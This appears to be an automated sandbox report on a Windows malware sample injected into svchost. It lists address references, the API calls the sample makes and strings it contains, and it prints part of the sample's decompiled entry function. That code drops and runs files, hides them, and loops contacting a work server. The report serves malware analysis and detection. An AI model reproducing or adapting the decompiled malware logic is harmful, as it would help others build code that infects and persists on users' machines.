                                                                                0x0012d903
                                                                                0x0012d918
                                                                                0x0012d92a
                                                                                0x0012d92f
                                                                                0x0012d932
                                                                                0x0012d934
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d934
                                                                                0x0012d7a8
                                                                                0x0012d7aa
                                                                                0x0012d7b0
                                                                                0x0012d7be
                                                                                0x0012d7c3
                                                                                0x0012d7cf
                                                                                0x0012d7d6
                                                                                0x0012d7e1
                                                                                0x0012d7e2
                                                                                0x0012d7e2
                                                                                0x0012d7e5
                                                                                0x0012d7ed
                                                                                0x0012d7ee
                                                                                0x0012d7f4
                                                                                0x0012d81f
                                                                                0x0012d825
                                                                                0x0012d828
                                                                                0x0012d828
                                                                                0x0012d82a
                                                                                0x0012d830
                                                                                0x0012d832
                                                                                0x0012d85b
                                                                                0x0012d85b
                                                                                0x0012d85d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d878
                                                                                0x0012d87f
                                                                                0x0012d884
                                                                                0x0012d887
                                                                                0x0012d889
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d88f
                                                                                0x0012d895
                                                                                0x0012d897
                                                                                0x0012d897
                                                                                0x0012d89d
                                                                                0x0012d8a2
                                                                                0x0012d8a4
                                                                                0x0012d8a7
                                                                                0x0012d8ad
                                                                                0x0012d8ad
                                                                                0x00000000
                                                                                0x0012d834
                                                                                0x0012d834
                                                                                0x0012d836
                                                                                0x0012d836
                                                                                0x0012d839
                                                                                0x0012d839
                                                                                0x0012d83b
                                                                                0x0012d83c
                                                                                0x0012d83c
                                                                                0x0012d842
                                                                                0x0012d847
                                                                                0x0012d850
                                                                                0x0012d855
                                                                                0x0012d858
                                                                                0x0012d858
                                                                                0x00000000
                                                                                0x0012d858
                                                                                0x0012d832
                                                                                0x0012d783
                                                                                0x0012d792
                                                                                0x0012d797
                                                                                0x0012d79a
                                                                                0x0012d79c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d773
                                                                                0x0012d778
                                                                                0x0012d77b
                                                                                0x0012d77d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d77d
                                                                                0x00000000
                                                                                0x0012d783
                                                                                0x0012d70d
                                                                                0x0012d712
                                                                                0x0012d718
                                                                                0x0012d71f
                                                                                0x0012d721
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d73d
                                                                                0x0012d744
                                                                                0x0012d749
                                                                                0x0012d74c
                                                                                0x0012d74e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d74e
                                                                                0x0012d6d3
                                                                                0x0012d6f0
                                                                                0x0012d6f7
                                                                                0x0012d6fc
                                                                                0x0012d6ff
                                                                                0x0012d701
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d701
                                                                                0x0012d67a
                                                                                0x0012d67b
                                                                                0x0012d67c
                                                                                0x0012d6bb
                                                                                0x0012d6bb
                                                                                0x0012d6c0
                                                                                0x0012d6c3
                                                                                0x0012d6c5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d67f
                                                                                0x0012d696
                                                                                0x0012d69d
                                                                                0x0012d6a2
                                                                                0x0012d6a5
                                                                                0x0012d6a7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d6b0
                                                                                0x0012d6b0
                                                                                0x0012d6b3
                                                                                0x0012d6b4
                                                                                0x0012d6b5
                                                                                0x0012d6b5
                                                                                0x00000000
                                                                                0x0012d6bb
                                                                                0x0012cbc7
                                                                                0x0012cbca
                                                                                0x0012d5f2
                                                                                0x0012d5f8
                                                                                0x0012d5fa
                                                                                0x0012d600
                                                                                0x0012d611
                                                                                0x0012d616
                                                                                0x0012d61e
                                                                                0x0012d621
                                                                                0x0012d623
                                                                                0x0012d62e
                                                                                0x0012d635
                                                                                0x0012d637
                                                                                0x0012d63d
                                                                                0x0012d643
                                                                                0x0012d649
                                                                                0x0012d64f
                                                                                0x0012d655
                                                                                0x0012d65a
                                                                                0x0012d65a
                                                                                0x0012d637
                                                                                0x0012d623
                                                                                0x00000000
                                                                                0x0012d5fa
                                                                                0x0012cbd0
                                                                                0x0012cbd3
                                                                                0x0012d5e1
                                                                                0x0012cdec
                                                                                0x00000000
                                                                                0x0012cdec
                                                                                0x0012cbd9
                                                                                0x0012d589
                                                                                0x0012d589
                                                                                0x0012d589
                                                                                0x0012d58b
                                                                                0x0012d58b
                                                                                0x0012d58b
                                                                                0x0012d591
                                                                                0x0012d593
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d595
                                                                                0x0012d598
                                                                                0x0012d59a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d59c
                                                                                0x0012d59e
                                                                                0x0012d59e
                                                                                0x0012d5a1
                                                                                0x0012d5a1
                                                                                0x0012d5a3
                                                                                0x0012d5a5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d5a7
                                                                                0x0012d5aa
                                                                                0x0012d5c3
                                                                                0x0012d5c5
                                                                                0x00000000
                                                                                0x0012d5c5
                                                                                0x0012d5ac
                                                                                0x0012d5ad
                                                                                0x0012d5b0
                                                                                0x0012d5b3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d5b5
                                                                                0x0012d5c8
                                                                                0x0012d5c8
                                                                                0x0012d5cb
                                                                                0x0012d5cb
                                                                                0x00000000
                                                                                0x0012d5d3
                                                                                0x0012cbdf
                                                                                0x0012cbe2
                                                                                0x0012ce26
                                                                                0x0012ce2c
                                                                                0x0012ce2e
                                                                                0x0012ce31
                                                                                0x0012ce34
                                                                                0x0012ce36
                                                                                0x0012cea0
                                                                                0x0012cea0
                                                                                0x0012cea8
                                                                                0x0012cea8
                                                                                0x0012ceaf
                                                                                0x0012ceb9
                                                                                0x0012cebf
                                                                                0x0012cec2
                                                                                0x0012d53e
                                                                                0x0012d53e
                                                                                0x0012d541
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012cec9
                                                                                0x0012cecc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012ced2
                                                                                0x0012ced5
                                                                                0x0012d519
                                                                                0x0012d519
                                                                                0x0012d524
                                                                                0x0012d526
                                                                                0x0012d529
                                                                                0x0012d53b
                                                                                0x00000000
                                                                                0x0012cedb
                                                                                0x0012cee8
                                                                                0x0012ceed
                                                                                0x0012ceef
                                                                                0x0012cef2
                                                                                0x0012cef4
                                                                                0x0012cef9
                                                                                0x0012cefe
                                                                                0x0012cf00
                                                                                0x0012cf00
                                                                                0x0012cf02
                                                                                0x0012cf02
                                                                                0x0012cf04
                                                                                0x0012cf06
                                                                                0x0012cf0b
                                                                                0x0012cf0d
                                                                                0x0012cf12
                                                                                0x0012cf14
                                                                                0x0012cf1a
                                                                                0x0012cf20
                                                                                0x0012cf20
                                                                                0x0012cf1c
                                                                                0x0012cf1c
                                                                                0x0012cf1c
                                                                                0x0012cf25
                                                                                0x0012cf25
                                                                                0x0012cf27
                                                                                0x0012cf29
                                                                                0x0012cf2b
                                                                                0x0012cf81
                                                                                0x0012cf83
                                                                                0x0012cfdc
                                                                                0x0012cfe1
                                                                                0x0012d020
                                                                                0x0012d025
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d033
                                                                                0x0012d039
                                                                                0x0012d03f
                                                                                0x0012d042
                                                                                0x0012d042
                                                                                0x0012d044
                                                                                0x0012d045
                                                                                0x0012d045
                                                                                0x0012d049
                                                                                0x0012d04b
                                                                                0x0012d04d
                                                                                0x0012d04f
                                                                                0x0012d057
                                                                                0x0012d059
                                                                                0x0012d059
                                                                                0x0012d057
                                                                                0x0012d06d
                                                                                0x0012d073
                                                                                0x0012d07a
                                                                                0x0012d07a
                                                                                0x0012d07d
                                                                                0x0012d07d
                                                                                0x0012d07f
                                                                                0x0012d080
                                                                                0x0012d080
                                                                                0x0012d084
                                                                                0x0012d084
                                                                                0x00000000
                                                                                0x0012d084
                                                                                0x0012cfef
                                                                                0x0012cff5
                                                                                0x0012cffb
                                                                                0x0012cffe
                                                                                0x0012cffe
                                                                                0x0012d000
                                                                                0x0012d001
                                                                                0x0012d001
                                                                                0x0012d005
                                                                                0x0012d005
                                                                                0x00000000
                                                                                0x0012cf85
                                                                                0x0012cfb1
                                                                                0x0012cfbe
                                                                                0x0012cfc3
                                                                                0x0012cfc9
                                                                                0x0012cfcc
                                                                                0x0012cfcc
                                                                                0x0012d007
                                                                                0x0012d007
                                                                                0x0012d009
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d00b
                                                                                0x00000000
                                                                                0x0012cfcf
                                                                                0x0012cfcf
                                                                                0x0012cfd1
                                                                                0x0012cfd2
                                                                                0x0012cfd4
                                                                                0x00000000
                                                                                0x0012cfd6
                                                                                0x0012cfd8
                                                                                0x00000000
                                                                                0x0012cfd8
                                                                                0x0012cfd4
                                                                                0x0012cf2d
                                                                                0x0012cf2d
                                                                                0x0012cf2d
                                                                                0x0012cf30
                                                                                0x0012cf32
                                                                                0x0012cf32
                                                                                0x0012cf32
                                                                                0x0012cf58
                                                                                0x0012cf58
                                                                                0x0012cf58
                                                                                0x0012cf5a
                                                                                0x0012cf5b
                                                                                0x0012cf5b
                                                                                0x0012cf61
                                                                                0x0012cf63
                                                                                0x0012cf65
                                                                                0x0012d086
                                                                                0x0012d086
                                                                                0x0012d089
                                                                                0x0012d0fe
                                                                                0x0012d0fe
                                                                                0x0012d104
                                                                                0x0012d104
                                                                                0x0012d105
                                                                                0x0012d10c
                                                                                0x0012d112
                                                                                0x0012d112
                                                                                0x0012d115
                                                                                0x0012d124
                                                                                0x0012d129
                                                                                0x0012d129
                                                                                0x0012d12c
                                                                                0x0012d130
                                                                                0x0012d13e
                                                                                0x0012d144
                                                                                0x0012d145
                                                                                0x0012d147
                                                                                0x0012d155
                                                                                0x0012d155
                                                                                0x0012d147
                                                                                0x0012d177
                                                                                0x0012d179
                                                                                0x0012d17c
                                                                                0x0012d33e
                                                                                0x0012d372
                                                                                0x0012d37f
                                                                                0x0012d384
                                                                                0x0012d38a
                                                                                0x0012d38d
                                                                                0x0012d390
                                                                                0x0012d390
                                                                                0x0012d392
                                                                                0x0012d393
                                                                                0x0012d393
                                                                                0x0012d397
                                                                                0x0012d399
                                                                                0x0012d39b
                                                                                0x0012d39d
                                                                                0x0012d3a5
                                                                                0x0012d3a7
                                                                                0x0012d3a7
                                                                                0x0012d3a5
                                                                                0x0012d3af
                                                                                0x0012d3bd
                                                                                0x0012d3c3
                                                                                0x0012d3c7
                                                                                0x0012d3d5
                                                                                0x0012d3db
                                                                                0x0012d3dc
                                                                                0x0012d3de
                                                                                0x0012d3ec
                                                                                0x0012d3ec
                                                                                0x0012d3de
                                                                                0x0012d40e
                                                                                0x0012d410
                                                                                0x0012d413
                                                                                0x0012d420
                                                                                0x0012d428
                                                                                0x0012d42f
                                                                                0x0012d435
                                                                                0x0012d439
                                                                                0x0012d447
                                                                                0x0012d44d
                                                                                0x0012d44e
                                                                                0x0012d450
                                                                                0x0012d45b
                                                                                0x0012d45b
                                                                                0x0012d450
                                                                                0x0012d461
                                                                                0x0012d461
                                                                                0x00000000
                                                                                0x0012d182
                                                                                0x0012d18d
                                                                                0x0012d195
                                                                                0x0012d19c
                                                                                0x0012d1a2
                                                                                0x0012d1a6
                                                                                0x0012d1b4
                                                                                0x0012d1bb
                                                                                0x0012d1bd
                                                                                0x0012d1c8
                                                                                0x0012d1c8
                                                                                0x0012d1bd
                                                                                0x0012d1da
                                                                                0x0012d1e1
                                                                                0x0012d1e7
                                                                                0x0012d1e8
                                                                                0x0012d1ea
                                                                                0x0012d468
                                                                                0x0012d468
                                                                                0x0012d46b
                                                                                0x0012d47a
                                                                                0x0012d47f
                                                                                0x0012d47f
                                                                                0x0012d482
                                                                                0x0012d485
                                                                                0x0012d48b
                                                                                0x0012d48e
                                                                                0x0012d496
                                                                                0x0012d49b
                                                                                0x0012d4a2
                                                                                0x0012d4ac
                                                                                0x0012d4b1
                                                                                0x0012d4d8
                                                                                0x0012d4de
                                                                                0x0012d4e4
                                                                                0x0012d4e6
                                                                                0x0012d500
                                                                                0x0012d506
                                                                                0x0012d513
                                                                                0x0012d4e8
                                                                                0x0012d4f4
                                                                                0x0012d4fc
                                                                                0x0012d4fc
                                                                                0x0012d4e6
                                                                                0x0012d48e
                                                                                0x00000000
                                                                                0x0012d1f0
                                                                                0x0012d1fd
                                                                                0x0012d231
                                                                                0x0012d23e
                                                                                0x0012d243
                                                                                0x0012d249
                                                                                0x0012d24c
                                                                                0x0012d24f
                                                                                0x0012d24f
                                                                                0x0012d251
                                                                                0x0012d252
                                                                                0x0012d252
                                                                                0x0012d256
                                                                                0x0012d258
                                                                                0x0012d25a
                                                                                0x0012d25c
                                                                                0x0012d264
                                                                                0x0012d266
                                                                                0x0012d266
                                                                                0x0012d264
                                                                                0x0012d26e
                                                                                0x0012d27c
                                                                                0x0012d282
                                                                                0x0012d286
                                                                                0x0012d294
                                                                                0x0012d29a
                                                                                0x0012d29b
                                                                                0x0012d29d
                                                                                0x0012d2ab
                                                                                0x0012d2ab
                                                                                0x0012d29d
                                                                                0x0012d2cd
                                                                                0x0012d2cf
                                                                                0x0012d2d2
                                                                                0x0012d2e3
                                                                                0x0012d2eb
                                                                                0x0012d2f2
                                                                                0x0012d2f8
                                                                                0x0012d2fc
                                                                                0x0012d30e
                                                                                0x0012d314
                                                                                0x0012d315
                                                                                0x0012d317
                                                                                0x0012d326
                                                                                0x0012d326
                                                                                0x0012d317
                                                                                0x0012d2fc
                                                                                0x00000000
                                                                                0x0012d2d2
                                                                                0x0012d1ea
                                                                                0x0012d17c
                                                                                0x0012d08b
                                                                                0x0012d094
                                                                                0x0012d097
                                                                                0x0012d097
                                                                                0x0012d09a
                                                                                0x0012d09d
                                                                                0x0012d0bb
                                                                                0x0012d0bb
                                                                                0x0012d0c2
                                                                                0x0012d0c4
                                                                                0x0012d0c6
                                                                                0x0012d0f4
                                                                                0x0012d0f9
                                                                                0x00000000
                                                                                0x0012d0f9
                                                                                0x0012d0c8
                                                                                0x0012d0ca
                                                                                0x0012d0d3
                                                                                0x0012d0d5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d0d7
                                                                                0x00000000
                                                                                0x0012d0d7
                                                                                0x0012d0cc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d09f
                                                                                0x0012d09f
                                                                                0x0012d09f
                                                                                0x0012d0a8
                                                                                0x0012d0ab
                                                                                0x0012d0ae
                                                                                0x0012d0b5
                                                                                0x0012d0b6
                                                                                0x0012d0b6
                                                                                0x0012d0b6
                                                                                0x0012d0b6
                                                                                0x00000000
                                                                                0x0012d09f
                                                                                0x0012cf6b
                                                                                0x0012cf72
                                                                                0x0012cf74
                                                                                0x0012cf7a
                                                                                0x0012d013
                                                                                0x0012d013
                                                                                0x0012d015
                                                                                0x0012d01d
                                                                                0x0012d01d
                                                                                0x0012d013
                                                                                0x00000000
                                                                                0x0012cf35
                                                                                0x0012cf35
                                                                                0x0012cf37
                                                                                0x0012cf38
                                                                                0x0012cf3a
                                                                                0x00000000
                                                                                0x0012cf3c
                                                                                0x0012cf3c
                                                                                0x0012cf47
                                                                                0x0012cf4c
                                                                                0x0012cf52
                                                                                0x0012cf55
                                                                                0x00000000
                                                                                0x0012cf55
                                                                                0x0012cf3a
                                                                                0x0012cf2b
                                                                                0x0012ced5
                                                                                0x0012d547
                                                                                0x0012d54e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d554
                                                                                0x0012d557
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d55d
                                                                                0x0012d563
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d56c
                                                                                0x0012d577
                                                                                0x0012d57d
                                                                                0x0012d583
                                                                                0x0012ce38
                                                                                0x0012ce38
                                                                                0x0012ce38
                                                                                0x0012ce3b
                                                                                0x0012ce3f
                                                                                0x0012ce3f
                                                                                0x0012ce40
                                                                                0x0012ce89
                                                                                0x0012ce90
                                                                                0x0012ce42
                                                                                0x0012ce42
                                                                                0x0012ce42
                                                                                0x0012ce43
                                                                                0x0012ce76
                                                                                0x0012ce7d
                                                                                0x0012ce80
                                                                                0x0012ce45
                                                                                0x0012ce45
                                                                                0x0012ce46
                                                                                0x0012ce56
                                                                                0x0012ce5d
                                                                                0x0012ce60
                                                                                0x0012ce60
                                                                                0x0012ce46
                                                                                0x0012ce43
                                                                                0x0012ce98
                                                                                0x0012ce99
                                                                                0x0012ce9c
                                                                                0x0012ce9c
                                                                                0x00000000
                                                                                0x0012ce3b
                                                                                0x0012ce36
                                                                                0x0012cbe8
                                                                                0x0012cbeb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012cbf1
                                                                                0x0012cbf5
                                                                                0x0012cdf2
                                                                                0x0012cdfa
                                                                                0x0012ce04
                                                                                0x0012ce09
                                                                                0x0012ce13
                                                                                0x0012ce16
                                                                                0x0012ce1b
                                                                                0x00000000
                                                                                0x0012ce1b
                                                                                0x0012cbfb
                                                                                0x0012cc00
                                                                                0x0012cc02
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012cc08
                                                                                0x0012cc0d
                                                                                0x0012cc10
                                                                                0x0012cc16
                                                                                0x0012cdd2
                                                                                0x0012cdd2
                                                                                0x0012cdd8
                                                                                0x0012cde2
                                                                                0x0012cde7
                                                                                0x00000000
                                                                                0x0012cc1c
                                                                                0x0012cc28
                                                                                0x0012cc35
                                                                                0x0012cc3a
                                                                                0x0012cc3b
                                                                                0x0012cc47
                                                                                0x0012cc4a
                                                                                0x0012cc64
                                                                                0x0012cc64
                                                                                0x0012cc66
                                                                                0x0012cc4c
                                                                                0x0012cc55
                                                                                0x0012cc58
                                                                                0x0012cc5b
                                                                                0x0012cc62
                                                                                0x0012cc63
                                                                                0x0012cc63
                                                                                0x00000000
                                                                                0x0012cc68
                                                                                0x0012cc8d
                                                                                0x0012cc9a
                                                                                0x0012cc9f
                                                                                0x0012ccb4
                                                                                0x0012ccba
                                                                                0x0012ccbd
                                                                                0x0012ccc0
                                                                                0x0012ccdc
                                                                                0x0012cce2
                                                                                0x0012cce5
                                                                                0x0012cce7
                                                                                0x0012cdcc
                                                                                0x0012cced
                                                                                0x0012cced
                                                                                0x0012ccf3
                                                                                0x0012ccfe
                                                                                0x0012cd21
                                                                                0x0012cd2a
                                                                                0x0012cd31
                                                                                0x0012cd3b
                                                                                0x0012cd47
                                                                                0x0012cd4d
                                                                                0x0012cd52
                                                                                0x0012cd55
                                                                                0x0012cd77
                                                                                0x0012cd7d
                                                                                0x0012cd7f
                                                                                0x0012cd89
                                                                                0x0012cd98
                                                                                0x0012cd9d
                                                                                0x0012cda5
                                                                                0x0012cda5
                                                                                0x0012cdaa
                                                                                0x0012cdac
                                                                                0x0012cdad
                                                                                0x0012cdb2
                                                                                0x0012cdb2
                                                                                0x0012cdb8
                                                                                0x0012cdc4
                                                                                0x0012cdc4
                                                                                0x0012cce7
                                                                                0x00000000
                                                                                0x0012ccc0
                                                                                0x0012cc66
                                                                                0x0012cc16
                                                                                0x0012dad2
                                                                                0x0012dad5
                                                                                0x0012dadb
                                                                                0x00000000
                                                                                0x0012cb60
                                                                                0x0012cb63
                                                                                0x00000000
                                                                                0x0012cb63
                                                                                0x0012cb5e
                                                                                0x0012ca4b
                                                                                0x0012ca4e
                                                                                0x0012ca4e
                                                                                0x00000000
                                                                                0x0012c9d2
                                                                                0x0012c9d2
                                                                                0x0012c9d8
                                                                                0x0012c9dd
                                                                                0x0012c9e0
                                                                                0x0012c9e1
                                                                                0x0012c9e3
                                                                                0x0012c9e9
                                                                                0x0012c9f1
                                                                                0x0012c9fb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012c9fb
                                                                                0x00000000
                                                                                0x0012c9d8
                                                                                0x0012c9d0
                                                                                0x0012c9a5
                                                                                0x0012c9ab
                                                                                0x0012c9b2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012c9b2
                                                                                0x0012c92f
                                                                                0x0012c935
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • closesocket.WS2_32(?), ref: 0012CA4E
                                                                                • closesocket.WS2_32(?), ref: 0012CB63
                                                                                • GetTempPathA.KERNEL32(00000120,?), ref: 0012CC28
                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0012CCB4
                                                                                • WriteFile.KERNEL32(0012A4B3,?,-000000E8,?,00000000), ref: 0012CCDC
                                                                                • CloseHandle.KERNEL32(0012A4B3), ref: 0012CCED
                                                                                • wsprintfA.USER32 ref: 0012CD21
                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0012CD77
                                                                                • WaitForSingleObject.KERNEL32(?,0000EA60), ref: 0012CD89
                                                                                • CloseHandle.KERNEL32(?), ref: 0012CD98
                                                                                • CloseHandle.KERNEL32(?), ref: 0012CD9D
                                                                                • DeleteFileA.KERNEL32(?), ref: 0012CDC4
                                                                                • CloseHandle.KERNEL32(0012A4B3), ref: 0012CDCC
                                                                                • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0012CFB1
                                                                                • GetSystemDirectoryA.KERNEL32 ref: 0012CFEF
                                                                                • GetSystemDirectoryA.KERNEL32 ref: 0012D033
                                                                                • lstrcatA.KERNEL32(?,03E00108), ref: 0012D10C
                                                                                • SetFileAttributesA.KERNEL32(?,00000080), ref: 0012D155
                                                                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0012D171
                                                                                • WriteFile.KERNEL32(00000000,03E0012C,?,?,00000000), ref: 0012D195
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0012D19C
                                                                                • SetFileAttributesA.KERNEL32(?,00000002), ref: 0012D1C8
                                                                                • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0012D231
                                                                                • lstrcatA.KERNEL32(?,03E00108,?,?,?,?,?,?,?,00000100), ref: 0012D27C
                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 0012D2AB
                                                                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 0012D2C7
                                                                                • WriteFile.KERNEL32(00000000,03E0012C,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 0012D2EB
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 0012D2F2
                                                                                • SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 0012D326
                                                                                • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0012D372
                                                                                • lstrcatA.KERNEL32(?,03E00108,?,?,?,?,?,?,?,00000100), ref: 0012D3BD
                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 0012D3EC
                                                                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 0012D408
                                                                                • WriteFile.KERNEL32(00000000,03E0012C,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 0012D428
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 0012D42F
                                                                                • SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 0012D45B
                                                                                • CreateProcessA.KERNEL32(?,00130264,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0012D4DE
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0012D4F4
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0012D4FC
                                                                                • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0012D513
                                                                                • closesocket.WS2_32(?), ref: 0012D56C
                                                                                • Sleep.KERNEL32(000003E8), ref: 0012D577
                                                                                • ExitProcess.KERNEL32 ref: 0012D583
                                                                                • wsprintfA.USER32 ref: 0012D81F
                                                                                  • Part of subcall function 0012C65C: send.WS2_32(00000000,?,00000000), ref: 0012C74B
                                                                                • closesocket.WS2_32(?), ref: 0012DAD5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseHandle$AttributesCreate$Writeclosesocket$EnvironmentProcessVariablelstrcat$DeleteDirectorySystemwsprintf$ExitObjectPathSingleSleepTempWaitsend
                                                                                • String ID: .dat$.sys$4$@$C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe$\$\$drivers\$except_info$flags_upd$lid_file_upd$local_time$localcfg$srv_time$time_cfg$work_srv$wtm_c$wtm_r$wtm_w
                                                                                • API String ID: 562065436-3866487918
                                                                                • Opcode ID: e1dcc2fff9de347e08d4c5b7f92e564f800640902165c3409acd3eccebe6c867
                                                                                • Instruction ID: a87e5d6aa5723a839b0d99326e3bb80f02502eb87e41f002d1f527640a7dafb0
                                                                                • Opcode Fuzzy Hash: e1dcc2fff9de347e08d4c5b7f92e564f800640902165c3409acd3eccebe6c867
                                                                                • Instruction Fuzzy Hash: 20B2B7B1900228AFEB15EFA4FD46EEE7BFDEB18304F140069F605A7191D7709AA5CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00129A6B Relevance: 100.5, APIs: 48, Strings: 9, Instructions: 799stringsleepregistryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 89%
                                                                                			_entry_(CHAR* _a12, void* _a15) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				char _v28;
				char _v32;
				union _GET_FILEEX_INFO_LEVELS _v36;
				CHAR* _v40;
				char _v44;
				char _v48;
				struct _PROCESS_INFORMATION _v64;
				char _v80;
				char _v112;
				char _v371;
				char _v372;
				char _v671;
				char _v672;
				char _v704;
				struct _STARTUPINFOA _v772;
				char _v1271;
				char _v1272;
				char _v1672;
				char _t238;
				long _t239;
				char _t242;
				long _t244;
				CHAR* _t248;
				char _t250;
				intOrPtr _t257;
				char _t267;
				intOrPtr* _t272;
				char _t276;
				char _t279;
				char _t282;
				char _t283;
				void* _t284;
				char _t294;
				CHAR* _t303;
				int _t304;
				char _t309;
				CHAR* _t312;
				char _t318;
				int _t324;
				CHAR* _t325;
				char _t328;
				char* _t331;
				char _t332;
				char _t340;
				char _t344;
				CHAR* _t357;
				CHAR* _t358;
				int _t359;
				int _t373;
				long _t379;
				void* _t383;
				void* _t396;
				void* _t401;
				char _t402;
				char _t403;
				intOrPtr* _t410;
				void* _t411;
				char _t417;
				char _t418;
				void* _t424;
				intOrPtr _t426;
				void* _t428;
				char* _t436;
				intOrPtr _t441;
				CHAR* _t442;
				void* _t450;
				void* _t451;
				char _t459;
				void* _t464;
				void* _t465;
				void* _t467;
				void* _t468;
				void* _t469;
				void* _t470;
				void* _t471;
				void* _t474;
				intOrPtr _t475;

				SetErrorMode(3); // executed
				SetErrorMode(3); // executed
				SetUnhandledExceptionFilter(E00126511); // executed
				E0012EC54(); // executed
				_t475 =  *0x13201f; // 0x1
				if(_t475 != 0) {
					__eflags =  *0x1333d8; // 0x0
					if(__eflags == 0) {
						L126:
						CreateThread(0, 0, E0012405E, 0, 0, 0); // executed
						__imp__#115(0x1010,  &_v1672); // executed
						E0012E52E(_t449, __eflags);
						E0012EAAF(1, 0);
						E00121D96(_t438, 0x132118);
						E001280C9(_t438); // executed
						CreateThread(0, 0, E0012877E, 0, 0, 0); // executed
						E00125E6C(__eflags);
						E00123132();
						E0012C125(__eflags);
						E00128DB1(_t438);
						Sleep(0xbb8); // executed
						E0012C4EE();
						while(1) {
							__eflags =  *0x1333d0; // 0x0
							if(__eflags == 0) {
								goto L129;
							}
							_t239 = GetTickCount();
							__eflags = _t239 -  *0x1333d0 - 0x109a0;
							if(_t239 -  *0x1333d0 < 0x109a0) {
								L131:
								Sleep(0x1a90); // executed
								continue;
							}
							L129:
							_t238 = E0012C913(); // executed
							__eflags = _t238;
							if(_t238 == 0) {
								 *0x1333d0 = GetTickCount();
							}
							goto L131;
						}
					}
					_a12 = 0xa;
					while(1) {
						_t242 = DeleteFileA(0x1333d8); // executed
						__eflags = _t242;
						if(_t242 != 0) {
							break;
						}
						__eflags = _a12;
						if(_a12 <= 0) {
							break;
						}
						_t244 = GetLastError();
						__eflags = _t244 - 2;
						if(_t244 == 2) {
							break;
						}
						_t219 =  &_a12;
						 *_t219 = _a12 - 1;
						__eflags =  *_t219;
						Sleep(0x3e8);
					}
					E0012EE2A(_t438, 0x1333d8, 0, 0x104);
					_t465 = _t465 + 0xc;
					goto L126;
				} else {
					_v12 = 0;
					if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) == 0) {
						_v672 = 0;
					}
					if(_v672 == 0x22) {
						E0012EF00( &_v672,  &_v671);
						_t436 = E0012ED23( &_v672, 0x22);
						_t465 = _t465 + 0x10;
						if(_t436 != 0) {
							 *_t436 = 0;
						}
					}
					_t248 = GetCommandLineA();
					_t459 = 0x1322f8;
					_a12 = _t248;
